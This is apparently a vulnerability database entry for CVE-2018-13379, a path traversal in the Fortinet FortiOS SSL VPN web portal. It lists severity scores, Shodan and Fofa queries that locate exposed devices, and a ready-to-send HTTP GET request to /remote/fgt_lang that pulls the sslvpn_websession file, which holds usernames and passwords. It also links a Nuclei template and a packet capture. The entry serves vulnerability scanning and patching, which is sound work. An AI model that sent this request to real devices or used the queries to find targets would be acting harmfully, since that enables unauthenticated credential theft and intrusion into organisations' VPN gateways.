| Title | Fortinet FortiOS - Credentials Disclosure |
|---|---|
| Author | organiccrap |
| Severity | Critical |
| Impact | An attacker can obtain sensitive information such as usernames and passwords. |
| Remediation | Apply the necessary patches or updates provided by Fortinet to fix the vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.94475 |
| CVE ID | CVE-2018-13379 |
| CWE ID | CWE-22 |
| Shodan Query | http.html:"/remote/login" "xxxxxxxx"http.favicon.hash:945408572cpe:"cpe:2.3:o:fortinet:fortios"port:10443 http.favicon.hash:945408572 |
| Fofa Query | body="/remote/login" "xxxxxxxx"icon_hash=945408572 |
| Tags | cve2018 cve fortios lfi kev fortinet vkev vuln |
Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).
GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-13379.pcap
N/AN/A